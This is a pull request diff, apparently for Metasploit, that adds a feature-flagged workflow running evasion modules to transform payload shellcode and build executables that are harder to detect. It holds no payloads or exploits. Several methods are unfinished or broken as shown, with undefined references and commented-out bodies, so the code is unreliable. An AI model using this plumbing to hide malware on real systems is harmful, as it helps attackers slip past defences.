### PR TITLE
Spike new evasion workflow

### DIFF
--- a/lib/msf/base/simple/exploit.rb
+++ b/lib/msf/base/simple/exploit.rb
@@ -158,7 +158,7 @@ module Exploit
       return false
     rescue ::Exception => e
       exploit.error = e
-      exploit.print_error("Exploit failed: #{e}")
+      exploit.print_error("Exploit failed: #{e}\n#{e.backtrace.join("\n")}")
       elog("Exploit failed (#{exploit.refname})", error: e)
     end
 

--- a/lib/msf/core/auxiliary/report.rb
+++ b/lib/msf/core/auxiliary/report.rb
@@ -519,6 +519,7 @@ module Auxiliary::Report
       :type => "#{ltype}.localpath"
     )
 
+    self.instance_variable_set(:@store_local_path, full_path.dup)
     return full_path.dup
   end
 

--- a/lib/msf/core/encoded_payload.rb
+++ b/lib/msf/core/encoded_payload.rb
@@ -8,7 +8,7 @@ module Msf
 # This class wrappers an encoded payload buffer and the means used to create
 # one.
 #
-###
+###x
 class EncodedPayload
 
   include Framework::Offspring
@@ -20,7 +20,6 @@ class EncodedPayload
   def self.create(pinst, reqs = {})
     # Create the encoded payload instance
     p = EncodedPayload.new(pinst.framework, pinst, reqs)
-
     p.generate(reqs['Raw'])
 
     return p

--- a/lib/msf/core/evasion_mixins/common.rb
+++ b/lib/msf/core/evasion_mixins/common.rb
@@ -1,0 +1,160 @@
+module Msf
+  module EvasionMixins
+    module Common
+
+      SHELL_TO_SHELL = 'SHELLCODE_TO_SHELLCODE_EVASION_MODULE'.freeze
+      SHELL_TO_BIN = 'SHELLCODE_TO_BINARY_EVASION_MODULE'.freeze
+
+      def evasion_enabled?
+        @evasion_enabled ||= ::Msf::FeatureManager.instance.enabled?(Msf::FeatureManager::EVASION_MODULE_WORKFLOW)
+      end
+
+      def check_child_module_validity(child_module, input_reqs, output_reqs, exe_type)
+        result = { valid: true, errors: [] }
+        info = child_module.module_info
+
+        if info['ModuleInputs'] != input_reqs
+          result[:valid] = false
+          result[:errors] << :input_mismatch
+        end
+
+        if info['ModuleOutputs'] != output_reqs
+          result[:valid] = false
+          result[:errors] << :output_mismatch
+        end
+
+        # exe type check can be optional
+        if exe_type && !info['OutputExecutableTypes']&.include?(exe_type)
+          result[:valid] = false
+          result[:errors] << :executable_mismatch
+        end
+
+        result
+      end
+
+      # Configure the provided module with the input and output values.
+      # As we won't be interacting with the child module through the UI console, we can set the input to nil.
+      # This does _not_ affect our ability to have a Pry breakpoint in the module, so it's okay to set it to nil.
+      def configure_module_io(mod, mod_input, mod_output)
+        # self.user_input example:
+        # => #<Rex::Ui::Text::Input::Readline:0x00000001336d66c0
+        # @output=#<Rex::Ui::Text::Output::Stdio:0x0000000133e9a2d0 @at_prompt=false, @config={:color=>:auto}, @input=nil, @io=#<IO:<STDOUT>>>,
+        # @prompt="\x01\e[4m\x02msf\x01\e[0m\x02 exploit(\x01\e[1m\x02\x01\e[31m\x02windows/smb/psexec\x01\e[0m\x02) \x01\e[0m\x02> ",
+        # @rl_saved_proc=#<Proc:0x00000001336d5fb8 /Users/sjanusz/Programming/metasploit-framework/lib/rex/ui/text/input/readline.rb:194>>
+        # This means we might need to change the prompt?
+        # Or at least:
+        # mod.user_input = Rex::Ui::Text::Input::Readline.new
+        # mod.user_input.output = self.user_input.output
+        # We can likely ignore the rl_saved_proc; we won't be interacting with the module itself
+        # For output:
+        # => #<Rex::Ui::Text::Output::Stdio:0x0000000133e9a2d0 @at_prompt=false, @config={:color=>:auto}, @input=nil, @io=#<IO:<STDOUT>>>
+        # We should be able to do:
+        # mod.user_output = self.user_output
+
+        mod.init_ui(mod_input, mod_output)
+      end
+
+      def module_workflow(datastore_opt, opts: {})
+        mod = create_child_module(self.framework, datastore_opt)
+        return nil unless mod
+
+        configure_module(mod, opts: opts)
+        mod.run
+      end
+
+      def shellcode_to_shellcode_evasion_set?
+        !datastore[SHELL_TO_SHELL].blank?
+      end
+
+      def shellcode_to_binary_evasion_set?
+        !datastore[SHELL_TO_BIN].blank?
+      end
+
+      def perform_x_to_y_evasion(datastore_opt, input, opts: {})
+        if datastore[datastore_opt].blank?
+          vprint_status("#{datastore_opt} datastore option not set. Ignoring, and not performing this type of evasion.")
+          return input
+        end
+
+        # Create, configure and run the x->y evasion module
+        module_workflow(datastore[datastore_opt], opts: opts)
+      end
+
+      def perform_shellcode_to_shellcode_evasion(input, opts: {})
+        perform_x_to_y_evasion(SHELL_TO_SHELL, input, opts: opts) || input
+      end
+
+      def perform_shellcode_to_binary_evasion(input, opts: {})
+        perform_x_to_y_evasion(SHELL_TO_BIN, input, opts: opts) || input
+      end
+
+      # TODO: Modify this.
+      def configure_module_payload(mod, opts: {})
+        # Process shellcode-to-shellcode here maybe?
+        correct_payload = opts[:custom_payload] || self.payload&.deep_dup || MockPayload.new(opts: opts)
+
+        generate_single_payload_proc = ->(_pinst = nil, _platform = nil, _arch = nil, _explicit_target = nil) { correct_payload }
+        mod.define_singleton_method(:generate_single_payload, &generate_single_payload_proc)
+
+        payload_proc = -> { correct_payload }
+        mod.define_singleton_method(:payload, &payload_proc)
+      end
+
+      def configure_module_target(mod, opts: {})
+        correct_target = if self.respond_to?(:target)
+          # TODO: Should we priorities opts[:arch] here instead of self.target.arch?
+          self.target
+        else # This is tricky. In the scenario of a cmd staged payload, we don't have a 'target' here.
+          correct_arch = opts[:arch] || self.stage_arch
+          target_opts = opts.merge({ 'Arch' => correct_arch })
+          ::Msf::Exploit::Target.new('MockTarget', target_opts)
+        end
+
+        target_proc = -> { correct_target }
+        mod.define_singleton_method(:target, &target_proc)
+      end
+
+      def configure_module_datastore(mod)
+        # Configure some known options that Pro also configures:
+        %w[VERBOSE AutoRunScript WORKSPACE].each { |opt_name| mod.datastore[opt_name] = self.datastore[opt_name].dup }
+        # https://github.com/rapid7/pro/commit/1a05bc8fb1d9bfc2d9ca00484b44bc0344ec9a60
+        # Commit by HDM in Pro from 16 years ago; let's keep it around, no idea what the scenario is though, how it works or even _if_ it does
+        # Force any TCP listeners to use the local communication channel only
+        mod.datastore['ListenerComm'] = 'local'
+        # For compatibility with Pro, we might need to set the mod[:task] here as well.
+        mod[:task] = self[:task]
+      end
+
+      def configure_module(mod, opts: {})
+        mod.import_defaults
+        mod.register_parent(self)
+
+        configure_module_datastore(mod)
+        configure_module_io(mod, nil, self.user_output)
+        configure_module_payload(mod, opts: opts)
+        configure_module_target(mod, opts: opts)
+      end
+
+      def create_child_module(framework, module_name)
+        raise ArgumentError, "Provided Framework object is nil" if framework.nil?
+        raise ArgumentError, "Provided module name is nil" if module_name.nil?
+
+        module_instance = framework.modules.create(module_name)
+        raise "Something went wrong when creating the requested evasion module: '#{module_name}'" if module_instance.nil?
+
+        module_instance
+      end
+
+      # In scenarios where we don't have a payload at the top-level.
+      # This will occur in scenarios where we have a CMD fetch payload.
+      class MockPayload
+        attr_accessor :encoded, :arch
+
+        def initialize(opts: {})
+          @encoded = opts[:code].dup
+          @arch = opts[:arch].dup
+        end
+      end
+    end
+  end
+end

--- a/lib/msf/core/evasion_mixins/exe.rb
+++ b/lib/msf/core/evasion_mixins/exe.rb
@@ -1,0 +1,113 @@
+# -*- coding: binary -*-
+#
+# frozen_string_literal: true
+
+require 'msf/core/evasion_mixins/common'
+
+# A mixin used for providing Modules with payload evasion options and helper methods.
+# Prepended onto Msf::Exploit::EXE so that generate_payload_exe and
+# generate_payload_exe_service are intercepted when the evasion workflow
+# feature flag is enabled.
+#
+module Msf
+  module EvasionMixins
+    module EXE
+
+    include Msf::EvasionMixins::Common
+
+    # In the future to support binary -> binary evasion, override: def exe_post_generation(bin, opts)
+
+    # Overrides Msf::Exploit::EXE#generate_payload_exe via prepend.
+    def generate_payload_exe(opts = {})
+      return super unless evasion_enabled?
+      # Return if there are no evasion options set.
+      return super unless shellcode_to_shellcode_evasion_set? || shellcode_to_binary_evasion_set?
+
+      print_status("Generating EXE payload...")
+
+      # Step 1: Run shellcode-to-shellcode evasion if configured.
+      # This transforms the raw payload shellcode (e.g. encryption, encoding)
+      # and returns the modified shellcode.
+      transformed_shellcode = nil
+      if shellcode_to_shellcode_evasion_set?
+        print_status("Running Shellcode-to-Shellcode evasion module: #{datastore[SHELL_TO_SHELL]}...")
+        transformed_shellcode = module_workflow(datastore[SHELL_TO_SHELL], opts: opts)
+
+        if transformed_shellcode.nil?
+          print_error("Shellcode-to-Shellcode evasion module failed. Continuing without shellcode transformation.")
+        end
+      end
+
+      # Build a custom payload object carrying the transformed shellcode so
+      # that downstream modules (or super) receive it via payload.encoded.
+      evasion_opts = opts.dup
+      if transformed_shellcode
+        evasion_opts[:custom_payload] = MockPayload.new(opts: { code: transformed_shellcode, arch: opts[:arch] || target_arch })
+      end
+
+      # Step 2: Run shellcode-to-binary evasion if configured.
+      # This takes the (possibly transformed) shellcode and produces a full executable.
+      if shellcode_to_binary_evasion_set?
+        result = process_payload_and_return_executable(opts: evasion_opts)
+        return result if result
+      end
+
+      # No shellcode-to-binary module, or it failed — fall back to the
+      # standard EXE generation, injecting transformed shellcode via :code.
+      evasion_opts[:code] = transformed_shellcode if transformed_shellcode
+      super(evasion_opts)
+    end
+
+    # Overrides Msf::Exploit::EXE#generate_payload_exe_service via prepend.
+    def generate_payload_exe_service(opts = {})
+      return super unless evasion_enabled?
+      return super unless shellcode_to_shellcode_evasion_set? || shellcode_to_binary_evasion_set?
+
+      print_status("Generating EXE Service payload...")
+
+      # Step 1: Shellcode-to-shellcode evasion.
+      transformed_shellcode = nil
+      if shellcode_to_shellcode_evasion_set?
+        print_status("Running Shellcode-to-Shellcode evasion module: #{datastore[SHELL_TO_SHELL]}...")
+        transformed_shellcode = module_workflow(datastore[SHELL_TO_SHELL], opts: opts)
+
+        if transformed_shellcode.nil?
+          print_error("Shellcode-to-Shellcode evasion module failed. Continuing without shellcode transformation.")
+        end
+      end
+
+      evasion_opts = opts.dup
+      if transformed_shellcode
+        evasion_opts[:custom_payload] = MockPayload.new(opts: { code: transformed_shellcode, arch: opts[:arch] || target_arch })
+      end
+
+      # Step 2: Shellcode-to-binary evasion.
+      if shellcode_to_binary_evasion_set?
+        result = process_payload_and_return_executable_service(opts: evasion_opts)
+        return result if result
+      end
+
+      evasion_opts[:code] = transformed_shellcode if transformed_shellcode
+      super(evasion_opts)
+    end
+
+    private
+
+    def process_payload_and_return_executable(opts: {})
+      module_instance = create_child_module(self.framework, datastore[SHELL_TO_BIN])
+
+      validity_result = check_child_module_validity(module_instance, 'Payload', 'Executable', nil)
+      vprint_error "The selected Shellcode-to-Binary evasion module is not suitable for the current payload" unless validity_result[:valid]
+      return nil unless validity_result[:valid]
+
+      configure_module(module_instance, opts: opts)
+      print_status("Running Shellcode-to-Binary evasion module: #{datastore[SHELL_TO_BIN]}...")
+      module_instance.run
+    end
+
+    def process_payload_and_return_executable_service(opts: {})
+      process_payload_and_return_executable(opts: opts)
+    end
+  end
+end
+end

--- a/lib/msf/core/evasion_mixins/util_exe.rb
+++ b/lib/msf/core/evasion_mixins/util_exe.rb
@@ -1,0 +1,94 @@
+# -*- coding: binary -*-
+#
+# frozen_string_literal: true
+
+require 'msf/core/evasion_mixins/common'
+
+# A mixin used for providing Modules with payload evasion options and helper methods.
+# Prepended onto Msf::Util::EXE so that executable generation methods are
+# intercepted when the evasion workflow feature flag is enabled.
+#
+module Msf
+module EvasionMixins
+  module UtilExe
+
+    include Msf::EvasionMixins::Common
+
+    def to_executable(framework, arch, plat, code = '', fmt = '', opts = {})
+      return super unless evasion_enabled?
+
+      vprint_status("Creating an executable for: #{plat} - #{arch} ...")
+      super
+    end
+
+    def to_executable_fmt(framework, arch, plat, code, fmt, exeopts)
+      return super unless evasion_enabled?
+
+      # For backwards compatibility with the way this gets called when
+      # generating from Msf::Simple::Payload.generate_simple
+      if arch.is_a? Array
+        output = nil
+        arch.each do |a|
+          output = to_executable_fmt(framework, a, plat, code, fmt, exeopts)
+          break if output
+        end
+        return output
+      end
+
+      vprint_status("Creating an executable for #{platform} - #{arch}")
+
+      #code = shellcode_to_shellcode_evasion_enabled? ? (perform_shellcode_to_shellcode_evasion(code, opts: exeopts) || code) : code
+#
+      ## If we don't do shellcode->binary, call off to the original method to take care of that for us.
+      #return super unless shellcode_to_binary_evasion_enabled?
+#
+      #perform_shellcode_to_binary_evasion(code, opts: exeopts)
+    end
+
+    def to_executable_windows_x64(framework, code, fmt = 'exe', opts = {})
+      return super unless evasion_enabled?
+      # Our Windows evasion modules create an EXE, not a DLL.
+      return super if fmt.include?('dll')
+
+      vprint_status("Creating an executable for Windows - x64")
+
+      #code = shellcode_to_shellcode_evasion_enabled? ? (perform_shellcode_to_shellcode_evasion(code, opts: opts) || code) : code
+#
+      #return super unless shellcode_to_binary_evasion_enabled?
+#
+      #perform_shellcode_to_binary_evasion(code, opts: opts)
+    end
+
+    def to_executable_windows_x86(framework, code, fmt = 'exe', opts = {})
+      return super unless evasion_enabled?
+      return super if fmt.include?('dll')
+
+      vprint_status("Creating an executable for Windows - x86")
+
+      #code = shellcode_to_shellcode_evasion_enabled? ? (perform_shellcode_to_shellcode_evasion(code, opts: opts) || code) : code
+#
+      #return super unless shellcode_to_binary_evasion_enabled?
+#
+      #perform_shellcode_to_binary_evasion(code, opts: opts)
+    end
+
+    def to_exe_elf(framework, opts, template, code, big_endian = false)
+      return super unless evasion_enabled?
+      
+      # Taken from the original method definition.
+      if elf? code
+        return code
+      end
+
+      vprint_status("Creating an executable ELF file...")
+
+      #code = shellcode_to_shellcode_evasion_enabled? ? (perform_shellcode_to_shellcode_evasion(code, opts: opts) || code) : code
+#
+      ## If we don't do shellcode->binary, call off to the original method to take care of that for us.
+      #return super unless shellcode_to_binary_evasion_enabled?
+#
+      #perform_shellcode_to_binary_evasion(code, opts: opts)
+    end
+  end
+end
+end

--- a/lib/msf/core/exploit/cmd_stager/http.rb
+++ b/lib/msf/core/exploit/cmd_stager/http.rb
@@ -55,7 +55,7 @@ module HTTP
       return send_not_found(cli)
     end
 
-    print_status("Sending payload to #{client}")
+    print_status("Sending payload to #{client} of size: #{exe.length} bytes")
     send_response(cli, exe) # NOTE: exe is from Msf::Exploit::CmdStager
   end
 

--- a/lib/msf/core/exploit/exe.rb
+++ b/lib/msf/core/exploit/exe.rb
@@ -6,8 +6,13 @@
 #
 ###
 
+require 'msf/core/evasion_mixins/exe'
+
 module Msf
 module Exploit::EXE
+
+  # Prepend so that all relevant EXE generation methods will be wrapped by an evasion module run.
+  prepend Msf::EvasionMixins::EXE
 
   def initialize(info = {})
     super
@@ -41,9 +46,7 @@ module Exploit::EXE
     path ||= datastore['EXE::Custom']
     print_status("Using custom payload #{path}, no handler will be created!")
     datastore['DisablePayloadHandler'] = true
-    exe = nil
-    ::File.open(path,'rb') {|f| exe = f.read(f.stat.size)}
-    exe
+    File.binread(path)
   end
 
 
@@ -81,8 +84,7 @@ module Exploit::EXE
       raise Msf::NoCompatiblePayloadError, "Failed to generate an executable payload due to an invalid platform or arch."
     end
 
-    exe_post_generation(opts)
-    exe
+    exe_post_generation(exe, opts)
   end
 
   def generate_payload_exe_service(opts = {})
@@ -104,8 +106,7 @@ module Exploit::EXE
       exe = Msf::Util::EXE.to_win32pe_service(framework, pl, opts)
     end
 
-    exe_post_generation(opts)
-    exe
+    exe_post_generation(exe, opts)
   end
 
   def generate_payload_dll(opts = {})
@@ -135,8 +136,7 @@ module Exploit::EXE
       end
     end
 
-    exe_post_generation(opts)
-    dll
+    exe_post_generation(dll, opts)
   end
 
   def generate_payload_dccw_gdiplus_dll(opts = {})
@@ -157,8 +157,8 @@ module Exploit::EXE
       dll = Msf::Util::EXE.to_win32pe_dccw_gdiplus_dll(framework, pl, opts)
     end
 
-    exe_post_generation(opts)
-    dll
+    exe_post_generation(dll, opts)
+
   end
 
   def generate_payload_msi(opts = {})
@@ -226,10 +226,11 @@ protected
     end
   end
 
-  def exe_post_generation(opts)
+  def exe_post_generation(bin, opts)
     if opts[:fellback]
       print_status("Warning: Falling back to default template: #{opts[:fellback]}")
     end
+    bin
   end
 
 end

--- a/lib/msf/core/exploit/remote/smb/client/psexec.rb
+++ b/lib/msf/core/exploit/remote/smb/client/psexec.rb
@@ -321,9 +321,9 @@ module Exploit::Remote::SMB::Client::Psexec
     end
 
     if subfolder
-      print_status("Created \\#{fileprefix}\\#{filename}...")
+      print_status("Created \\#{fileprefix}\\#{filename}... (#{exe.length} bytes)")
     else
-      print_status("Created \\#{filename}...")
+      print_status("Created \\#{filename}... (#{exe.length} bytes)")
     end
 
     # Disconnect from the share

--- a/lib/msf/core/feature_manager.rb
+++ b/lib/msf/core/feature_manager.rb
@@ -28,6 +28,7 @@ module Msf
     LDAP_SESSION_TYPE = 'ldap_session_type'
     SHOW_SUCCESSFUL_LOGINS = 'show_successful_logins'
     DISPLAY_MODULE_ACTION = 'display_module_action'
+    EVASION_MODULE_WORKFLOW = 'evasion_module_workflow'
 
     DEFAULTS = [
       {
@@ -124,6 +125,12 @@ module Msf
         requires_restart: false,
         default_value: true,
         developer_notes: 'Added as a feature so users can turn it off if they wish to reduce clutter in their terminal'
+      }.freeze,
+      {
+        name: EVASION_MODULE_WORKFLOW,
+        description: 'When enabled will allow for running evasion modules as part of exploitation',
+        requires_restart: false,
+        default_value: false
       }.freeze
     ].freeze
 

--- a/lib/msf/core/module/module_info.rb
+++ b/lib/msf/core/module/module_info.rb
@@ -42,6 +42,14 @@ module Msf::Module::ModuleInfo
     module_info['Name']
   end
 
+  def module_inputs
+    module_info['ModuleInputs']
+  end
+
+  def module_outputs
+    module_info['ModuleOutputs']
+  end
+
 
   #
   # Return the module's notes (including AKA and NOCVE descriptors).

--- a/lib/msf/core/module_inputs/payload.rb
+++ b/lib/msf/core/module_inputs/payload.rb
@@ -1,0 +1,18 @@
+# -*- coding: binary -*-
+#
+# frozen_string_literal: true
+
+module Msf
+  module ModuleInputs
+    module Payload
+      def initialize(info = {})
+        super(
+            merge_info(
+            info,
+            'ModuleInputs' => 'Payload'
+            )
+        )
+      end
+    end
+  end
+end

--- a/lib/msf/core/module_outputs/executable.rb
+++ b/lib/msf/core/module_outputs/executable.rb
@@ -1,0 +1,18 @@
+# -*- coding: binary -*-
+#
+# frozen_string_literal: true
+
+module Msf
+  module ModuleOutputs
+    module Executable
+      def initialize(info = {})
+        super(
+            merge_info(
+            info,
+            'ModuleOutputs' => 'Executable'
+            )
+        )
+      end
+    end
+  end
+end

--- a/lib/msf/core/module_outputs/executable_types/exe.rb
+++ b/lib/msf/core/module_outputs/executable_types/exe.rb
@@ -1,0 +1,21 @@
+# -*- coding: binary -*-
+#
+# frozen_string_literal: true
+
+module Msf
+  module ModuleOutputs
+    module ExecutableTypes
+      module EXE
+        def initialize(info = {})
+          executable_types = info['OutputExecutableTypes'] || []
+          super(
+              merge_info(
+              info, 
+              'OutputExecutableTypes' => executable_types + ['EXE']
+              )
+          )
+        end
+      end
+    end
+  end
+end

--- a/lib/msf/core/module_outputs/executable_types/exe_only.rb
+++ b/lib/msf/core/module_outputs/executable_types/exe_only.rb
@@ -1,0 +1,21 @@
+# -*- coding: binary -*-
+#
+# frozen_string_literal: true
+
+module Msf
+  module ModuleOutputs
+    module ExecutableTypes
+      module EXEOnly
+        def initialize(info = {})
+          executable_types = info['OutputExecutableTypes'] || []
+          super(
+              merge_info(
+              info, 
+              'OutputExecutableTypes' => executable_types + ['EXEOnly']
+              )
+          )
+        end
+      end
+    end
+  end
+end

--- a/lib/msf/core/module_outputs/executable_types/exe_service.rb
+++ b/lib/msf/core/module_outputs/executable_types/exe_service.rb
@@ -1,0 +1,21 @@
+# -*- coding: binary -*-
+#
+# frozen_string_literal: true
+
+module Msf
+  module ModuleOutputs
+    module ExecutableTypes
+      module EXEService
+        def initialize(info = {})
+          executable_types = info['OutputExecutableTypes'] || []
+          super(
+              merge_info(
+              info, 
+              'OutputExecutableTypes' => executable_types + ['EXEService']
+              )
+          )
+        end
+      end
+    end
+  end
+end

--- a/lib/msf/core/module_outputs/executable_types/exe_small.rb
+++ b/lib/msf/core/module_outputs/executable_types/exe_small.rb
@@ -1,0 +1,21 @@
+# -*- coding: binary -*-
+#
+# frozen_string_literal: true
+
+module Msf
+  module ModuleOutputs
+    module ExecutableTypes
+      module EXESmall
+        def initialize(info = {})
+          executable_types = info['OutputExecutableTypes'] || []
+          super(
+              merge_info(
+              info, 
+              'OutputExecutableTypes' => executable_types + ['EXESmall']
+              )
+          )
+        end
+      end
+    end
+  end
+end

--- a/lib/msf/core/module_outputs/intermediate_file.rb
+++ b/lib/msf/core/module_outputs/intermediate_file.rb
@@ -1,0 +1,20 @@
+# -*- coding: binary -*-
+#
+# frozen_string_literal: true
+
+# This file requires extra processing/instructions on the target.
+# For example, calling off to a second executable to process, execute or compile this file
+module Msf
+  module ModuleOutputs
+    module IntermediateFile
+      def initialize(info = {})
+        super(
+            merge_info(
+            info,
+            'ModuleOutputs' => 'IntermediateFile'
+            )
+        )
+      end
+    end
+  end
+end

--- a/lib/msf/core/module_outputs/payload.rb
+++ b/lib/msf/core/module_outputs/payload.rb
@@ -1,0 +1,18 @@
+# -*- coding: binary -*-
+#
+# frozen_string_literal: true
+
+module Msf
+  module ModuleOutputs
+    module Payload
+      def initialize(info = {})
+        super(
+            merge_info(
+            info,
+            'ModuleOutputs' => 'Payload'
+            )
+        )
+      end
+    end
+  end
+end

--- a/lib/msf/core/module_set.rb
+++ b/lib/msf/core/module_set.rb
@@ -211,7 +211,8 @@ class Msf::ModuleSet < Hash
       # Filter out incompatible architectures
       if (opts['Arch'])
         if (!architectures_by_module[name])
-          architectures_by_module[name] = Array.wrap(module_metadata.arch)
+          module_architectures = module_metadata.arch.split(', ')
+          architectures_by_module[name] = Array.wrap(module_architectures)
         end
 
         next if ((architectures_by_module[name] & opts['Arch']).empty? == true)
@@ -225,6 +226,24 @@ class Msf::ModuleSet < Hash
 
         next if ((platforms_by_module[name] & opts['Platform']).empty? == true)
       end
+
+      # Filter out incompatible module inputs
+      # if (opts['ModuleInputs'])
+      #   if (!platforms_by_module[name])
+      #     platforms_by_module[name] = module_metadata.module_inputs
+      #   end
+# 
+      #   next if ((platforms_by_module[name] & opts['ModuleInputs']).empty? == true)
+      # end
+# 
+# 
+      # if (opts['ModuleOutputs'])
+      #   if (!platforms_by_module[name])
+      #     platforms_by_module[name] = module_metadata.module_outputs
+      #   end
+# 
+      #   next if ((platforms_by_module[name] & opts['ModuleOutputs']).empty? == true)
+      # end
 
       # Custom filtering
       next if (each_module_filter(opts, name, entry) == true)

--- a/lib/msf/core/payload.rb
+++ b/lib/msf/core/payload.rb
@@ -460,6 +460,30 @@ class Payload < Msf::Module
     return encoders
   end
 
+  def compatible_evasion_modules(architectures, platform_names)
+    results = Msf::Modules::Metadata::Cache.instance.find(
+      'type'     => [['evasion'], []],
+      'platform' => [platform_names, []],
+      'arch'     => [architectures, []]
+    )
+  end
+
+  def compatible_shellcode_to_shellcode_evasion_modules
+    compat_modules = compatible_evasion_modules([*self.arch], [*self.platform.names])
+    results = compat_modules.reject do |metadata_result|
+      created_mod = framework.modules.create(metadata_result.ref_name)
+      created_mod.module_inputs != 'Payload' || created_mod.module_outputs != 'Payload'
+    end.map {|metadata_result| metadata_result.ref_name }
+  end
+
+  def compatible_shellcode_to_binary_evasion_modules
+    compat_modules = compatible_evasion_modules([*self.arch], [*self.platform.names])
+    results = compat_modules.reject do |metadata_result|
+      created_mod = framework.modules.create(metadata_result.ref_name)
+      created_mod.module_inputs != 'Payload' || created_mod.module_outputs != 'Executable'
+    end.map {|metadata_result| metadata_result.ref_name }
+  end
+
   #
   # Returns the array of compatible nops for this payload instance.
   #
@@ -472,6 +496,37 @@ class Payload < Msf::Module
     }
 
     return nops
+  end
+
+  def self.choose_evasion(mod, datastore_option_name, caller_method_name, evasion_type)
+    evasion_name = mod.datastore[datastore_option_name]
+    evasion_mod = mod.framework.modules.create(evasion_name)
+    return nil unless evasion_mod
+
+    # Is using the payload here correct? I think so, but it gets wonky in the case of CMD stager payloads.
+    # The ideal fix would be to correctly set the payload when we have a cmd stager set.
+    if payload.nil?
+      
+    end
+    compatible_evasion_modules = case evasion_type
+    when 'SHELLCODE_TO_BINARY'
+      payload.compatible_shellcode_to_binary_evasion_modules
+    when 'SHELLCODE_TO_SHELLCODE'
+      payload.compatible_shellcode_to_shellcode_evasion_modules
+    end.map(&:first)
+
+    # If there are any preferred evasion modules, sort them here. For now, return the first entry.
+    return configure_evasion.call(compatible_evasion_modules.first) if compatible_evasion_modules.any?
+    
+    nil
+  end
+
+  def self.choose_shellcode_to_shellcode_evasion(mod)
+    choose_evasion(mod, 'SHELLCODE_TO_SHELLCODE_EVASION_MODULE', 'choose_shellcode_to_shellcode_evasion')
+  end
+
+  def self.choose_shellcode_to_binary_evasion(mod)
+    choose_evasion(mod, 'SHELLCODE_TO_BINARY_EVASION_MODULE', 'choose_shellcode_to_binary_evasion')
   end
 
   # Select a reasonable default payload and minimally configure it

--- a/lib/msf/core/payload/adapter/fetch/server/http.rb
+++ b/lib/msf/core/payload/adapter/fetch/server/http.rb
@@ -68,8 +68,10 @@ module Msf::Payload::Adapter::Fetch::Server::HTTP
     if (user_agent = request.headers['User-Agent'])
       client += " (#{user_agent})"
     end
-    vprint_status("Sending payload to #{client}")
-    cli.send_response(payload_response(srvexe))
+
+    res = payload_response(srvexe)
+    vprint_status("Sending payload to #{client} of size: #{res.body.length} bytes")
+    cli.send_response(res)
   end
 
   def payload_response(srvexe)

--- a/lib/msf/core/payload/stager.rb
+++ b/lib/msf/core/payload/stager.rb
@@ -190,6 +190,7 @@ module Msf::Payload::Stager
 
       # Generate and encode the stage if stage encoding is enabled
       begin
+        # TODO: In the future, we can consider performing evasion on this stage.
         p = generate_stage(opts)
         p = encode_stage(p)
       rescue ::RuntimeError, ::StandardError => e
@@ -294,7 +295,8 @@ module Msf::Payload::Stager
         'ForceSaveRegisters' => true,
         'ForceEncode'        => true,
         'Arch'               => self.stage_arch,
-        'Platform'           => self.stage_platform)
+        'Platform'           => self.stage_platform
+      )
 
       if encp.encoder
         if stage_enc_mod

--- a/lib/msf/ui/console/command_dispatcher/common.rb
+++ b/lib/msf/ui/console/command_dispatcher/common.rb
@@ -130,6 +130,8 @@ module Common
       end
     end
 
+    output_evasion_module_workflow_options(mod)
+
     # Print the selected target
     if (mod.exploit? and mod.target)
       mod_targ = Serializer::ReadableText.dump_exploit_target(mod, '   ')
@@ -149,6 +151,48 @@ module Common
 
     # Uncomment this line if u want target like msf2 format
     #print("\nTarget: #{mod.target.name}\n\n")
+  end
+
+  def output_evasion_module_workflow_options(mod)
+    return unless framework.features.enabled?(Msf::FeatureManager::EVASION_MODULE_WORKFLOW)
+    return unless mod.exploit? || mod.payload?
+
+    shell_to_shell = mod.datastore['SHELLCODE_TO_SHELLCODE_EVASION_MODULE']
+    shell_to_bin =  mod.datastore['SHELLCODE_TO_BINARY_EVASION_MODULE']
+
+    if shell_to_shell
+      e = framework.modules.create(shell_to_shell)
+
+      if (!e)
+        print_error("Invalid Shellcode-to-Shellcode evasion module defined: #{mod.datastore['SHELLCODE_TO_SHELLCODE_EVASION_MODULE']}\n")
+        return
+      end
+
+      e.share_datastore(mod.datastore)
+
+      if (e)
+        e_opt = Serializer::ReadableText.dump_options(e, '   ')
+        e_opt  << '    No options registered.' if e_opt.length == 0
+        print("\nShellcode-to-Shellcode evasion module options (#{shell_to_shell}):\n\n#{e_opt}\n") if e_opt
+      end
+    end
+
+    if shell_to_bin
+      e = framework.modules.create(shell_to_bin)
+
+      if (!e)
+        print_error("Invalid Shellcode-to-Binary evasion module defined: #{mod.datastore['SHELLCODE_TO_BINARY_EVASION_MODULE']}\n")
+        return
+      end
+
+      e.share_datastore(mod.datastore)
+
+      if (e)
+        e_opt = Serializer::ReadableText.dump_options(e, '   ')
+        e_opt  << '    No options registered.' if e_opt.length == 0
+        print("\nShellcode-to-Binary evasion module options (#{shell_to_bin}):\n\n#{e_opt}\n") if e_opt
+      end
+    end
   end
 
   # This is for the "use" and "set" commands

--- a/lib/msf/ui/console/command_dispatcher/core.rb
+++ b/lib/msf/ui/console/command_dispatcher/core.rb
@@ -2190,6 +2190,42 @@ class Core
       end
     end
 
+    # Set SHELLCODE_TO_SHELLCODE_EVASION_MODULE
+    if name.upcase == 'SHELLCODE_TO_SHELLCODE_EVASION_MODULE' && active_module && (active_module.exploit? || active_module.payload?) && !clear
+      value = trim_path(value, 'evasion')
+
+      payload = active_module.framework.payloads.create(datastore['PAYLOAD'])
+      
+      unless payload
+        print_error("Please set a valid PAYLOAD before setting the SHELLCODE_TO_SHELLCODE_EVASION_MODULE.")
+        return false
+      end
+
+      index_from_list(payload.compatible_shellcode_to_shellcode_evasion_modules, value) do |mod|
+        return false unless mod && mod.respond_to?(:first)
+        # [name, class] from compatible_shellcode_to_shellcode_evasion_modules
+        value = mod.first
+      end
+    end
+
+    # Set SHELLCODE_TO_BINARY_EVASION_MODULE
+    if name.upcase == 'SHELLCODE_TO_BINARY_EVASION_MODULE' && active_module && (active_module.exploit? || active_module.payload?) && !clear
+      value = trim_path(value, 'evasion')
+
+      payload = active_module.framework.payloads.create(datastore['PAYLOAD'])
+      
+      unless payload
+        print_error("Please set a valid PAYLOAD before setting the SHELLCODE_TO_BINARY_EVASION_MODULE.")
+        return false
+      end
+
+      index_from_list(payload.compatible_shellcode_to_binary_evasion_modules, value) do |mod|
+        return false unless mod && mod.respond_to?(:first)
+        # [name, class] from compatible_shellcode_to_binary_evasion_modules
+        value = mod.first
+      end
+    end
+
     unless global || valid_options.any? { |vo| vo.casecmp?(name) }
       message = "Unknown datastore option: #{name}."
       suggestion = DidYouMean::SpellChecker.new(dictionary: valid_options).correct(name).first

--- a/lib/msf/ui/console/command_dispatcher/exploit.rb
